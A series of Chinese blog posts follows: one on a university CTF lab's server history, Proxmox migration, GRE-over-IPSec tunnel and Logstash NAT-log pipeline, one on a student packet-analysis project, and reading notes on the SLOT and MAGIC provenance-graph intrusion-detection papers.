
sudo iptables -t nat -A POSTROUTING -o enp0s31f6 -d 10.0.0.0/8 -j MASQUERADE

实验室虚拟化资源的密集需求

本科实验室（下亦称“小组”）目前约有 25 名学生及 2 位指导老师，每年春季会组织集中招新，每年约招收 5-8 名不同方向的新生。小组平时主要以参加 CTF 比赛为主线，引导大家进行网络安全方面的学习和实践，同时也会承担一些工程项目，因此有一小部分可自行支配的资金。硬件条件方面，小组具备一块独立的办公区域，空调等设施齐全，甚至配有一张行军床。网络方面为千兆有线 & Wi-Fi 7 网络接入，互联网带宽为校园网提供，视情况最高可达 1000 Mbps，网络设备全部采用华为、锐捷等主流品牌，给日常实验提供有力的保障。氛围十分融洽，每周会组织一次技术 workshop ，知识库、Git 仓库等一直传承和更新，经常会有挑灯夜战的同学。以上是我在实验室期间的主观感受。

作为 2021 年加入小组的学生，我梳理了一下实验室的虚拟化资源的变迁：

• 2021年之前，小组有两台浪潮 NP5540 安装了 VMware Exsi，每台装有两颗 Xeon E5-2407 和 16GB 内存。这配置，甚至还不如 2021 年的笔记本。

• 2022 年，一名学长捐赠了一台戴尔 Precision T5600，装有两颗 Xeon E5-2660 和 32GB 内存。原本是跑的 ArchLinux ，镜像站的起源也是在这台机器，后来安装了 Proxmox VE，将镜像站迁移到了另一台专用机器。

• 2023年，我了解到系里有一套仿真靶场平台，但软件十分难用，每个赛题环境都是独立的虚拟机，启动缓慢且占用资源巨大。为了给系里学生更好的实战体验，在与老师商讨和评估后，决定建设自己的开源靶场平台。系统为 3节点的深信服超融合 HCI。这些硬件后来由小组代为管理，成为了现今虚拟化资源的来源。

  • 硬件条件

    包括三台物理机，每台装有两颗 Xeon E5-2650 v4 和 192GB 的内存。此外还有两台华为 S5720 万兆交换机，一台承担存储网络，一台承担业务和管理网络。存储为戴尔 4T 企业级 SATA 盘 + 英特尔 480GB 企业级 SDD 缓存，总可用存储约 24 TB。

    

  • 软件环境

    原靶场系统自带的虚拟化平台是深信服超融合 HCI，由于版本较老旧（2019年）且已过维保期无法升级，易用性较差，管理面板繁琐且功能局限。尤其是底层的 RHEL 内核版本为 Linux 3.x，存在很大的安全隐患。

    不过不得不说深信服的服务还是很不错的，即便是过保的设备，依旧有工程师帮我们解答疑惑，甚至是远程调试困扰了我们很久的 Kernel Panic 问题（这个问题在下面详细展开）。

  • 故障排除

    运行过程中发现其中一个节点时常会 Kernel Panic，排查了内核日志、BMC日志均没有明确的报错，此时就考虑肯定是硬件故障，导致日志没有记录/落盘存储。

    由于部分设备仍在线上运行，为避免暴露某些网络拓扑，图片中对内网 IP 也打了马赛克。

    

    Kernel panic - not syncing: Timeout: Not all CPUs entered broadcast exception handler 这个错误通常是多核 CPU 系统中某些核在处理关键中断（broadcast exception）时未能及时响应 导致内核 panic 的现象。

    我们当时考虑的原因，要么是 CPU 本身有故障，要么是主板微码问题。但三台服务器配置和批次都是一模一样的，也相互替换过电源、内存，也调整过主板 ACPI、C-States 等参数，依旧无法解决。

    困扰了一个月后，换了一块浪潮的 X99 主板，问题立即消失。因此基本可以判断，是主板上硬件故障导致的。

  • 拥抱开源之路

    深信服 HCI 在当今企业级应用中确实是作为 VMware 替代者的存在，在热迁移、存储 IO 优化、内存管理方面有一些自主研发的技术。加之当前 VMware 的采购价格因素，相信它会成为优秀的国产虚拟化支撑者。

    但由于前述因素，导致我们急需更换更现代的虚拟化底层。由于旧的虚拟化平台是 Proxmox ，且其对 Ceph、SDN、HA 等分布式集群特性支持良好，就决定选它了。

    2024 年 1 月左右，全新的 Proxmox VE 8 部署完毕，可喜可贺。然而 VM 迁移过程中也遇到 Agent、网络、磁盘等各种兼容性问题，也花了学弟很长时间解决。

    

实验室糟糕的供电及环境

由于实验室只有一路供电，且个人用电器较多，断电问题始终困扰着我们。与学弟的聊天记录：

正常来说硬件 RAID 阵列卡都配有一块叫做 BBU（Battery Backup Unit）的小电池，用来给写缓存（通常为内存型如DDR 4）供电。然而我们的超融合架构中存储使用的 Ceph 而不是 RAID，若 vm IO 策略为 Write-Back，则断电时未落盘的数据将丢失，软件层面容易导致 vm 数据丢失或 FS 损坏，硬件层面亦会增加物理 HDD 磁盘的故障率。在一年期间，就发现多个 VM 文件系统遭到损坏，好在使用 fsck 工具都成功修复了。

此外，镜像站也使用裸磁盘映射的方式托管在这上面，频繁的意外断电导致服务可用率低下。

迁移

正式迁移机器时我已经毕业接近一年了，具体实施的事情均由学弟搞定，我只是参与了一些规划以及远程调试了一些配置。

网络背景

• 实验室在校园网的网段：10.9.214.0/24
• 实验室内部网段：172.18.1.0/24
• PVE 网段：
  • 业务：172.18.2.0/24
  • 管理：172.18.77.0/24
  • 存储：<无需变动>
• 数据中心下发的网段：10.9.18.0/24

规划与准备

迁移总体目标是：

• 保障硬件和数据完好无损；
• 尽量让 VM 少改动网络配置：由于之前并没有建设内部 DNS，不同 VM 间服务互联采用纯 IP 地址，而数据中心与实验室不在也无法修改到同一 VLAN，因此难免有些连接至校园网的 VM 需要改动 IP 地址；
• PVE 业务网段要与实验室内部加密互联；
• 完善 Grafana 观测、安全配置等。

硬件

学弟采用了安全可靠的方式搬运服务器，并对线缆打了标签。到现场后发现滑轨螺距不太适配，等待备件到货花费了几天时间，最终安全将硬件安装上架。理线之前 的图片如下。

与实验室网络互联

由于实验室与数据中心提供的网段没有直接路由，而是要跨学校的三层核心交换机，因此直接路由变得不太可行。若要达到实验室与 PVE 三层互通的效果，最直观的想法是两端网络设备建立 VPN 隧道，随后添加路由。

实验室现有一台思科三层交换机和一台支持 IPSEC 的防火墙，此外还闲置一台华为 AR 1220，亦支持 IPSEC。因此打算将 AR 1220 搬到数据中心，当作出口路由器，而集群中原有 S5720 则当作三层交换机。

IPSec 隧道只支持封装、加密单播报文；GRE 可封装、加密单播和组播报文，但不安全。一种经典的方案是结合两者优点，通过IPSec over GRE方式或GRE over IPSec方式实现设备间的互通。

参考：https://support.huawei.com/enterprise/zh/doc/EDOC1000079675/12d76f11

我们选择 GRE over IPSec 的方式，因为 GRE 支持组播和广播，一方面是建立广播链路后，对于 SMB、AirPlay 等依赖广播进行设备发现的协议非常友好；另一方面是日后可扩展 OSPF，例如加一路 Wireguard 来提升两端连接性能。

GRE只负责封装和传输，它本身不提供任何加密或认证机制。

而 IPSec 是一个协议簇，目标是在IP层提供安全服务。其核心协议包括三个：

• AH (Authentication Header) - 认证头协议

  AH 用于保证数据来源可靠和数据完整性，会在原始IP包头后面插入一个“AH头”，这个头包含了认证信息。它会对整个IP包（包括IP头和数据载荷）进行完整性校验。

• ESP (Encapsulating Security Payload) - 封装安全载荷协议

  ESP 用于保证数据机密性和防重放，它使用加密算法（如AES、3DES）对数据载荷进行加密。

• IKE (Internet Key Exchange) - 互联网密钥交换协议

  IKE 用于自动协商密钥和建立安全联盟（SA），在通信双方之间安全、自动地协商出加密参数。

IPSec 有两种应用范式：传输模式和隧道模式。

参考：https://support.huawei.com/enterprise/zh/doc/EDOC1100301617/c5d5a9b

在传输模式下，AH头或ESP头被插入到IP头与传输层协议头之间，保护报文载荷。由于传输模式未添加额外的IP头，所以原始报文中的IP地址在加密后报文的IP头中可见。以TCP报文为例，原始报文经过传输模式封装后，报文格式如所示。

在隧道模式下，AH头或ESP头被插到原始IP头之前，另外生成一个新的报文头放到AH头或ESP头之前，保护IP头和报文载荷。以TCP报文为例，原始报文经隧道模式封装后的报文结构如图所示。

我们采用的当然是隧道模式，配置步骤大致为：

• 定义组件

  • 定义 ACL ➡️ rule permit gre source 10.9.18.1 destination 10.9.214.100

  • 定义 IPSec Proposal ➡️ 封装模式: tunnel, 加密认证算法

  • 定义 IKE Peer ➡️ 对端公网IP, 预共享密钥

• 组合应用

  • 创建 PSec Policy ➡️ (关联以上ACL、Proposal、Peer三者)

  • 创建GRE隧道接口 ➡️ (配置源/目地址和隧道私网IP)

  • 绑定 ➡️ 在GRE隧道接口下应用IPSec策略

• 流量转发

  • 配置路由 ➡️ 将内网数据包的目标指向Tunnel隧道口

配置完成后，查看 ike sa：

查看 ipsec proposal：

隧道接口成功建立：

观测及安全

Prometheus 系列的主要就是三大组件：Node Exporter 用来数据采集，Prometheus 定期主动去 Node Exporter 暴露的端口上拉取数据，Grafana 通过 PromQL 查询出数据，然后做可视化。

目前对 Proxmox VE、Ceph、磁盘 SMART 进行了采集。

此外，还对路由器 NAT 日志进行了采集，发送至 syslog，再由 logstash 接收，保存至 ElasticSearch。

这里分享一下我们华为 AR 系列路由器适用的 logstash 配置文件：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89

input {
  udp {
    port => 11516
    type => "huawei_nat_logs"
  }
}

filter {
  if [type] == "huawei_nat_logs" {
    
    grok {
      match => { "message" => "<%{INT:syslog_pri}>%{GREEDYDATA:log_message}" }
    }
    grok {
      match => { "log_message" => "(?<timestamp>%{YEAR}-%{MONTHNUM}-%{MONTHDAY}\s+%{TIME})\s+%{HOSTNAME:hostname}\s+%%.*?:%{GREEDYDATA:kv_string}" }
    }

    
    kv {
      source => "kv_string"
      field_split => ","
      value_split => "="
    }

    
    mutate {
      convert => {
        "SourcePort" => "integer"
        "DestinationPort" => "integer"
        "SourceNatPort" => "integer"
        "DestinationNatPort" => "integer"
        "BeginTime" => "integer"
        "EndTime" => "integer"
        "SendPkts" => "integer"
        "SendBytes" => "integer"
        "RcvPkts" => "integer"
        "RcvBytes" => "integer"
      }
    }

    
    date {
      match => [ "timestamp", "yyyy-M-d HH:mm:ss" ] 
      target => "@timestamp"
      timezone => "UTC"
    }

    
    date {
      match => [ "BeginTime", "UNIX" ]
      target => "nat_session_begin_time" 
    }
    date {
      match => [ "EndTime", "UNIX" ]
      target => "nat_session_end_time"   
    }
    
    
    ruby {
      code => "
        if event.get('EndTime') && event.get('BeginTime')
          duration = event.get('EndTime') - event.get('BeginTime')
          event.set('nat_session_duration_seconds', duration)
        end
      "
    }

    mutate {
      remove_field => [ "message", "log_message", "kv_string", "timestamp", "syslog_pri", "BeginTime", "EndTime" ]
    }

  }
}

output {
  
  elasticsearch {
    hosts => ["https://127.0.0.1:9200"]
    cacert => '/home/elastic/elasticsearch/elasticsearch-8.11.4/config/certs/http_ca.crt'
    index => "huawei-nat-logs-%{+YYYY.MM.dd}"
    user => "elastic"
    password => "you_strong_password"
  }

  
  stdout {
    codec => rubydebug
  }
}

后记

由于时间缘故，暂时只能分享这么多了。其实还有很多安全和运维方面的设计和实施心得，虽然自己以后估计也不专职从事这块的工作，但几个人一起折腾网络设备还是挺有意思的。我也非常佩服学弟的研究和专注能力，他自己从一台完全没有手册的杂牌防火墙摸索出了 IPSEC 配置的命令。也很佩服另一位学弟，他 JAVA Web 很强，之前反序列化的那些链子都是他教的我。他俩目前都在考研，希望他俩都能有好的归宿。也非常感激本科实验室在过去的几年里对我的培养，同时感谢网信部门提供的一些实践机会，在那里我们接触到大量的企业级网络和安全设备。

希望我能在新的学习阶段，保持一颗求知和探索的心，多一分专注，少一些摸鱼，尽快让自己的研究工作走向正轨，用成果来回馈曾经支持和关注过我的人。

本文是我在国科大《网络攻防基础》课程上完成的大作业，实现了一个玩具型的分布式网络抓包和安全分析系统，具备基础的流量分析可视化、以及一些安全洞察和检测能力。

灵感来源于本科时帮学校排查一些安全事件，使用过安恒的 Ailpha 系统。感觉它十分不错，够性能、够智能、够人性化。

因此本次作业也想简单实现一个，总体原则就是：a) 采用消息队列以实现分布式；b) 使用 ElasticSearch 作为后端存储，这样配合 Kibana 能较好地实现可视化；c) 使用一些较新的协议解析字段，例如 SNI 实现域名探测；d) 具备插件式可扩展的安全检测模块。

Github 仓库地址： https://github.com/BaiHLiu/ToyNetAnalyzer

具体使用来看，在 OpenWrt 路由器上尝试部署了一下，除了内存占用比较大，运行还算稳定。代码 AI 含量较大，请仔细甄别。

主要功能

• 分布式架构：采用多个采集端（agent）进行数据包收集，推给中央服务器进行分析。
• 协议分析：支持对多种网络协议的分析，如 TCP、UDP、ICMP、HTTP、HTTPS 和 DNS 等。可提取源 IP、目的 IP、端口、数据包序列以及应用层数据等重要信息。
• 安全检测：插件化的检测模块支持，内置示例的 SQL 注入检测模块。
• SNI 检测：支持对 HTTPS 流量基于 TLS 握手信息的 SNI 识别，从而识别用户访问的域名。
• 数据存储与可视化：数据结构化后存储在 ElasticSearch 中，便于检索。利用 Kibana 创建了较为直观的仪表盘，用于监控网络流量趋势和统计信息。

技术实现

• 采集端实现：采集端使用 Python 的 scapy 库构建，依赖 libpcap 或 npcap 进行数据包捕获。将捕获的数据包转换为 JSON 格式后发送到 RabbitMQ 消息队列。
• 服务器分析：服务器端包含多个线程（可设置），作为 RabbitMQ 消费者接收的数据包。通过流表跟踪 TCP 会话以确保数据完整性。分析过程涉及在不同层（L2、L3、L4）解析数据包并提取相关信息，最后存储至 ElasticSearch。
• ElasticSearch 映射：在 ElasticSearch 中定义了多种映射，以高效存储数据包数据，包括 IP 信息、传输层详细信息、应用层数据和安全警报等字段。

安装与部署

1. Elasticsearch 和 Kibana 搭建：建议使用 docker 启动 Elasticsearch 和 Kibana。注意修改默认密码，随后修改 es_conn.py 中相关配置。
2. RabbitMQ 搭建：执行 docker run -d –name rabbitmq -p 5672:5672 -p 15672:15672 rabbitmq:management 命令启动 RabbitMQ。
3. 采集端安装：在 Windows 系统上需先安装 npcap。在类 Unix 系统中，安装 scapy 时通常会自动处理相关依赖。使用 pip install scapy pika 安装所需库，并配置 RabbitMQ 连接参数和要嗅探的网卡接口。
4. 服务器安装：安装 requirements.txt 中的依赖项。修改 es_conn.py 中的 ElasticSearch 连接参数，并在 main.py 中配置如 TCP 会话超时等其他设置。

局限性

• 性能瓶颈：在高流量场景下存在性能问题，有待进一步优化。
• 协议支持：协议解析可进一步改进，以支持更多协议并使其结构更合理。
• 可视化：目前的可视化受限于 Kibana 功能，可进行增强以实现更高级的分析。
• 安全检测：添加更多的安全检测扩展。

完整实验报告PDF

加载可能需要较长时间。

主要技术: 注意力机制挖掘潜在行为；图强化学习
发表: arxiv24
图学习类别: 图学习+嵌入向量库
方法分类: 图学习
概要: 使用注意力机制挖掘潜在重点行为，建立边以增强图表示；首次将强化学习引入溯源图分析，采用强化学习进行邻居选择，在抵御对抗方面效果明显。
特色: 注意力机制；强化学习

摘要

使用注意力机制挖掘潜在重点行为，建立边以增强图表示；首次将强化学习引入溯源图分析，采用强化学习进行邻居选择，在抵御对抗方面效果明显。

文章提到的主要贡献为：

1. 提出了一种先进的图挖掘技术，能够高效地发现图中多层级的隐藏关系，例如因果关系、上下文关系和间接关系。
2. 首次将强化学习引入溯源图分析。通过嵌入语义和拓扑特征，并利用强化学习的自适应动态，Slot能够有效应对高度对抗的环境。
3. 实现了自动构建攻击链、攻击路径识别。在真实世界的数据集进行了全面评估，结果证明了Slot在检测APT、抵御对抗攻击以及支持制定有效防御策略方面的能力。

方法

潜在行为挖掘

1. 潜在行为挖掘对后续图学习的帮助
   • 潜在行为挖掘旨在发现由多个“原子操作”组成的、有意义的“高级行为路径” 。例如，一个 connect -> recv -> write -> exec 的序列可能代表了一个完整的“下载并执行”的恶意战术。
   • 加速信息传播，解决“远距离依赖”问题：复杂的APT攻击中，攻击链条可能很长。标准的GNN信息传递机制中，一个节点的信息需要经过多层（多个hop）才能传播到远处的节点，这可能导致信息在传播过程中衰减或丢失。
   • 通过挖掘和建立一条直接的“潜在”边来连接这两个远距离的节点，信息可以在GNN的一层中直接从攻击起点传播到终点 。
2. 使用注意力机制的动机、实现细节
   • 动机：从海量可能的行为路径中，自动地、有重点地筛选出那些最关键、最能代表特定行为模式（无论是恶意的还是良性的）的路径 。
3. 潜在行为挖掘之后图谱结构变化的直观理解
   • 节点不变，边增加了，图变稠密了

基于强化学习的图嵌入

SLOT 采用的也是「图学习+嵌入向量库」的方法范式，回顾一下目前看过的这种范式的文章还有：Magic。

工作流程为：

• 在语义编码阶段，节点的语义特征和拓扑特征被嵌入到向量中。
• 基于节点特征向量的相似性计算，我们设计了一种自适应的Bandit邻居选择器，使用强化学习。
• 最后，我们通过整合多种关系（包括系统调用和潜在关系）来聚合特征，生成更新后的节点特征向量。

特征语义编码

SLOT 也是结合节点属性和图结构特征来编码节点：

• 节点属性特征：节点自身的描述信息（下称“字面描述信息”），比如进程的名称、命令行参数、文件路径。SLOT 使用 Word2Vec 生成原始嵌入（64维），并通过一个简单的多层感知机（MLP）来处理这些特征，得到一个基于属性的向量表示 $h_X$。

• 图拓扑特征：即节点在图中的连接关系和结构位置 。同样使用一个MLP来处理描述全图连接关系的邻接矩阵A，得到一个基于拓扑的向量表示 $h_A$

• 总结一下的话，对节点属性特征的编码主要就是有两种方式：a) 使用 word2vec、FastText、Bert 等语言模型对字面描述信息进行编码；b）使用节点的类型编码，常见的是 one-hot 编码；c）使用统计信息，例如节点的度、PageRank 值、聚类系数等。

  而这篇文章告诉我们的是，可以首先通过Word2Vec等方式获得节点的初始特征，再套一层特征变换（MLP）。结合文中方法而言，将节点属性和拓扑特征这两个差异性大的特征矩阵，都各自经过一层 MLP，模型可以学习到一种较优的属性融合方式。

  这种“分别变换，再行融合”，实现了异构特征的自适应融合。是对我做机器学习任务的一个启发。

  

自适应 Bandit 邻居选择

「Bandit」这词用的挺妙的，意为“土匪”。查这个词的时候还看到一个 Github 上的仓库https://github.com/PyCQA/bandit，Bandit is a tool designed to find common security issues in Python code.

在强化学习中，有一个“多臂老虎机”（Multi-armed Bandit）模型，由于我暂时没涉猎强化学习，建议参考：https://hrl.boyuai.com/chapter/1/多臂老虎机/

简单来说，「多臂老虎机」目标是在操作 T 次拉杆后获得尽可能高的累积奖励。由于奖励的概率分布是未知的，因此我们需要在“探索拉杆的获奖概率”和“根据经验选择获奖最多的拉杆”中进行权衡。“采用怎样的操作策略才能使获得的累积奖励最高”便是多臂老虎机问
题。（图片来源：boyuai.com)

回到本文的任务中，在从中心节点 v 及其邻居收集信息之前，采用 Top-p 采样，根据不同的关系过滤相似的邻居。第 l 层关系 r 的过滤阈值 $p_r^l$ 定义在 [0, 1] 范围内，表示从所有邻居中选择的比例。利用强化学习寻找最优阈值。

使用强化学习的目的是实现最佳的邻居筛选，即为每一种关系类型（Read、Write、Connect等）学习到一个最佳的邻居筛选阈值，以期过滤掉伪装节点。经过筛选后的图再进行后续的邻居消息聚合步骤。

根据强化学习的模型框架，学习过程如下：

• 代理：任务是为每一种关系类型（如“读”、“写”、“连接”等）学习到一个最佳的邻居筛选阈值 pr(l) 。
• 状态：用“所有训练节点与其邻居的平均相似度距离”来定义状态 。距离越小，说明筛选出的邻居质量越高，状态就越好。
• 动作：代理做的动作就是调整筛选阈值。
• 奖励：这是给代理的反馈。如果一个动作（调低阈值）使得筛选后的平均邻居距离变小了（即邻居更相似了），就给代理一个正奖励 (+1)。反之，如果距离变大了，就给一个负奖励 (-1) 。如 Figure5 所示，新旧状态下平均相似度距离的变化量为 $\Delta(S^{e-1},S^{(e)})$。
  

邻居信息聚合

文中的式10、式11表示了邻居信息聚合的步骤，使用两个步骤的聚合来结合上RL所得的筛选阈值：

1. 对于某节点v的关系r，模型会把所有通过了筛选的邻居节点的信息聚合到中心节点上，生成一个特定于该关系的中间向量 $h^{(l)}_{v,r}$
2. 把节点v的所有不同关系向量聚合起来，使用第二步中强化学习学到的**最优筛选阈值 $p_r^{(l)}$**，得到当前节点最终向量 $h_v^{(l)}$

威胁检测过程

使用「学习检测」和「异常检测」并行进行检测，分别使用 MLP 和孤立森林。

1. 基于 MLP 的学习检测

   为了与图神经网络联合训练相似性度量，一种启发式方法是在GCN聚合层之前将其作为新层附加。

   这边损失函数比较复杂， 我也没有搞特别明白，暂且请教了下 Gemini。它的训练过程优化了一个组合损失函数：

   $$
   \mathcal L= \mathcal L_{GNN}+\lambda_1 \mathcal L_{Simi}^{(1)} + \lambda_2 ||\Theta||_2
   $$

   • $\mathcal L_{GNN}$：主要的GNN损失。它衡量的是最终的节点嵌入向量 $Z_v$ 在经过MLP分类后，其预测结果与真实标签（良性/恶意）的差距有多大 。这是最核心的监督信号。
   • $\mathcal L_{Simi}^{(1)}$：一个辅助的相似度损失。它要求模型在第一层计算出的、用于感知相似度的特征向量，也应该能初步地区分良性与恶意 。这样做可以倒逼模型从一开始就学习更有区分度的特征表示。
   • $||\Theta||_2$：一个L2正则化项，用来防止模型过拟合，增强其泛化能力 。

2. 基于孤立森林的异常检测

   孤立森林 (Isolation Forest, iForest) 是一种无监督算法，擅长快速从数据中找到“离群点“。

   iForest 通过随机构建一系列决策树来尝试“孤立”每一个数据点，那些异常的点因为“与众不同”，通常只需要很少几次分割就能被完全孤立出来，因此它们在树中的平均路径长度就很短 。

   根据这个平均路径长度，算法会为每个节点计算一个 [0,1] 之间的异常分数 (Anomaly Score) 。

3. 最终决策

   在并行检测之后，Slot 将两个分类器的结果结合起来做出最终决策。如果监督学习模型对某行为（无论是良性还是恶意）做出了高置信度的预测，则采用该预测。另一方面，如果异常检测模型表明该行为可能存在异常，则将其标记为异常。

效果评估

数据集

选用图级别的 StreamSpot 和 Unicorn，以及节点级别的 DARPA E3（Trace、Cadets、Theia）。节点级别对比的工作有 Threatrace、Log2vec、FLASH、MAGIC，边级别对比的工作为 ShadeWatcher。

结果分析

• RQ1：与当前最先进的方法相比，Slot在检测APT方面有多有效？
• RQ2：使用Slot会产生多少系统开销？
• RQ3：Slot的各个组件在实现其预期功能方面有多有效？
• RQ4：不同的超参数如何影响Slot的检测能力？
• RQ5：Slot对对抗性攻击的鲁棒性如何？
• RQ6：Slot在辅助人工验证警报方面有多有效？

RQ1: 有效性分析

RQ2: 开销分析

与基于掩码图学习的 Magic （https://www.catop.top/2025/06/08/MAGIC-reading-report/）做了对比，也提到 Magic 的开销瓶颈其实在于 KNN 距离的计算。

这张图里面纵轴的 CDF 指的是累积分布函数（Cumulative Distribution Function），横轴表示完成一次检测所需的耗时，纵轴代表横轴对应的时间点之前，已经完成的检测任务所占的累积比例。

RQ3: 组件消融实验

我比较关心基于强化学习的邻居选择的作用，根据中间的图来看带有 awareness 的效果显著要高。

我还比较关注基于注意力的潜在行为挖掘的作用，根据右图来看引入隐关系信息对效果也有一些提升。

RQ4: 超参数选择

模型总体比较复杂，可调节的超参数多，这边对一些超参数进行了测试。

RQ5: 对抗攻击的鲁棒性

文章采用了两篇文献所提到的攻击方法，主要涉及在攻击图中插入良性结构：

• Akul Goyal, Xueyuan Han, Gang Wang, and Adam Bates. 2023. Sometimes, you aren’t what you do: Mimicry attacks against provenance graph host intrusion detection systems. In 30th Network and Distributed System Security Symposium.
• Mati Ur Rehman, Hadi Ahmadi, and Wajih Ul Hassan. 2024. FLASH: A Comprehensive Approach to Intrusion Detection via Provenance Graph Representation Learning. In 2024 IEEE Symposium on Security and Privacy (SP). IEEE Computer Society, 139–139.

对抗攻击方面与 Flash 这一个工作进行了对比：

总结与思考

这篇文章尽管还是 Arxiv 2410（博客写作时间为25年6月底），但感觉值得我学习的点有许多，包括但不限于：

1. 基于注意力的图增强方式：GNN 是逐跳进行邻居信息传播的，在此过程中远距离邻居间的关系被“淡化”。借助注意力机制来自动化筛选出需要重点关注的路径，并添加虚拟的边，那么就有助于节点的表示。借助这个思路，感觉或许也可以用一些攻击语义进行图增强，例如 ATT&CK 等。
2. 特征语义编码：对字面特征通过 Word2vec 提取嵌入，对拓扑特征使用邻接矩阵进行表示，最后两者分别过一层 MLP 进行聚合，看起来是一种融合不同尺度/语义特征的有效方法。
3. 将强化学习引入溯源图：据称为首个这样的工作。强化学习在图中主要起到邻居选择的作用，像是给邻居节点加入了一层“门控”，若开/关门后邻居节点更“相似”了则给予奖励。但由于个人对强化学习不甚了解，不太能理解这样设计奖励的动机是什么，有更深入理解的伙伴可以交流。
4. 并行使用使用 MLP 和孤立森林进行学习检测、异常检测。感觉从以往读过的文章来看，这类工作并不是很多，这篇文章告诉我们这是可行的。

这篇文章光着急复现了，文章并未通读，以下主要是结合代码来对方法细节进行自己的记录，整理的挺乱的，但迫于这周给自己定的计划有更新这篇阅读博客，就先更了，回头再改改。

MAGIC 是「图学习+嵌入向量范式」的节点级别溯源图 HIDS，设计图注意力网络（GAT）和掩码图学习，通过对节点类别和边存在性的重构，来引导模型从良性数据上学习一个编码器。随后采样良性节点进行编码，并计算 KNN 平均距离作为良性基线。检测阶段对亦节点进行编码嵌入，KNN 寻找良性节点邻居并计算平均距离，与良性基线共同计算得到异常分数。文章发表在 USENIX 24’，作者来自复旦大学、中山大学等。

💡图学习+嵌入向量范式：感觉溯源图 HIDS 的论文方法大体可以分为三种范式：图学习+分类模型、图学习+重建损失异常、图学习+嵌入向量库。具体例子可见我的另一博客，传送：图学习任务类型

摘要

以往的溯源图 APT 攻击检测存在一些典型不足：1）需要包含攻击数据和 APT 的先验知识；2）无法提取蕴含在溯源图中的丰富上下文信息；3）计算成本和内存开销大。

本文提供了一种灵活的自监督溯源图 APT 检测方法，能够在实体级别和批量日志级别两个粒度上实现检测。MAGIC 利用掩码图学习对良性系统实体和行为进行建模，实现图谱的深度特征提取和结构抽象。在检测过程，利用离群值挖掘系统异常行为。此外，MAGIC 专门设计了模型自适应机制以处理概念漂移问题。对 StreamSpot、Unicorn Wget、DARPA E3 三个数据集上进行了评估，表明其在所有场景中都取得有前景的结果，并在性能开销方面比 SOTA 方法有巨大优势。

感觉这篇文章背景设定广泛，是一篇通用性质强的文章。读完并且复现完了觉得确实不错，为溯源图的学习和表征提供了一种通用的编码方式。

读前思考

1. MAGIC 是如何处理概念漂移问题的？

2. 与基于重建误差的方法相比，这种自编码器的方式在训练的监督信号上有何特点？

3. 是否能通过这种编码器的方式，实现全图嵌入？

方法

MAGIC的核心在于利用掩码图表示学习来建模良性系统实体和行为，从而在溯源图上高效地提取深层特征和抽象结构。

MAGIC 设计的编码器是对节点进行嵌入表征的，那对于整图来说就可以采用池化或加权平均等方式获得整图嵌入。因此文章对批次（图）级别（StreamSpot、Unicorn Wget）和节点级数据集（DARPA E3）均有所体现。

图构建和特征工程

1. 节点特征选择

   趁这个机会正好熟悉一下常见几种数据集的特征。

   有类型日志：one-hot编码类型

   “对于提供了明确类型的日志，MAGIC 将节点和边的类型进行编号，作为标签。”

   • DARPA E3

     采用的节点类型有：

     1	['SUBJECT_PROCESS', 'FILE_OBJECT_FILE', 'FILE_OBJECT_UNIX_SOCKET', 'UnnamedPipeObject', 'NetFlowObject', 'FILE_OBJECT_DIR']

   • Wget

     采用的节点类型有：

     1	['file', 'process_memory', 'task', 'mmaped_file', 'path', 'socket', 'address', 'link']

   • StreamSpot

     采用的节点类型有：

     1	['process', 'thread', 'file', 'MAP_ANONYMOUS', 'NA', 'stdin', 'stdout', 'stderr']

   无类型日志：哈希处理

   “若日志未提供类别标签，则使用 xxhsah 对源节点 UUID 和目标节点 UUID 进行编码。”

   然而根据代码来看，对 StreamSpot、Unicorn Wget、DARPA E3 都采用了节点类型编码，xxhash 只是对 wget 数据集的 src uuid 和 dst uuid 进行了编码，实际构建 DGL 图时并未采用。

2. 数据清洗

   主要是对边进行去重。去重后边的初始嵌入为原始几条边的均值。这一步骤在DARPA E3 Trace数据集上平均减少了79.60%的边。

   对于这种 one-hot likely 的编码方式，用向量均值表示合理性如何？

特征掩码 (Feature Masking)

在训练前，随机选择一定比例的节点进行掩码（默认为0.5），用特殊的掩码标记替换其初始嵌入，以便后续重构。边不进行掩码。

图编码模块 (Graph Encoder)

包含多层堆叠的图注意力网络（GAT）。GAT层通过聚合节点自身及其邻居的特征（初始嵌入）来生成输出节点嵌入，并使用注意力机制衡量邻居的重要性。最终的节点嵌入由原始节点嵌入和所有GAT层的输出拼接而成。

🤔 对于一个中心节点，其3跳邻居的信息 只包含这个邻居本身，还是也包括这个邻居的邻居？

答：不包括该3跳邻居节点的邻居。一个3层GNN的“感受野”是3跳。它无法直接捕获到4跳邻居的信息。

图解码模块 (Graph Decoder)

图解码器的主要目的是为图表示模块的训练提供监督信号，通过结合掩码特征重构和基于样本的结构重构来优化模型。这与典型的图自编码器（通常同时进行特征和完整结构重构）以及图掩码自编码器（通常放弃结构重构以减少计算开销）有所不同。

• 掩码特征重构 解码器使用一个类似GAT的层来重构被掩码节点的初始嵌入，并计算特征重构损失（scaled cosine loss）。

• 基于样本的结构重构 通过对比采样节点对并预测它们之间的边概率来重构图结构。 使用一个简单的两层MLP来预测边概率，并采用二元交叉熵损失。

• 最终的优化目标函数是特征重构损失和结构重构损失的和。

检测模块

简单来说，区分是否恶意的原则为：“正常”样本在嵌入空间中是聚集的，而“异常”样本则会远离这些正常的聚集区。

模型的训练过程都只使用了良性的数据，意味着模型学习到的embed()函数，其目标就是将正常的系统实体（节点）映射到嵌入空间中的一个相对紧凑的区域。

因此，检测模块的任务就变成了：

• 用所有训练集（纯良性） 的嵌入点，构建一个“正常行为”基线。
• 对于一个测试集中的新样本节点，计算它到这个“正常”参照系中最近的k个点的平均距离。
• 如果这个平均距离非常大，就说明这个测试样本“离群”，即认为是异常节点。这个“平均距离”就成了我们的异常分数（Anomaly Score）。

代码实现

图处理

trace_parser.py

将最原始、非结构化的JSON日志，通过一系列正则匹配和逻辑处理，转换成结构化的边列表（.txt），再从中构建出NetworkX图，并将节点/边类型映射为整数ID。最终产物是包含多个NetworkX图（以node-link格式）的 train.pkl 和 test.pkl，以及各种类型映射和恶意实体信息。

原数据集的节点UUID转换成自己的整数ID，目的：

• 整数ID通常比长字符串UUID占用更少的内存
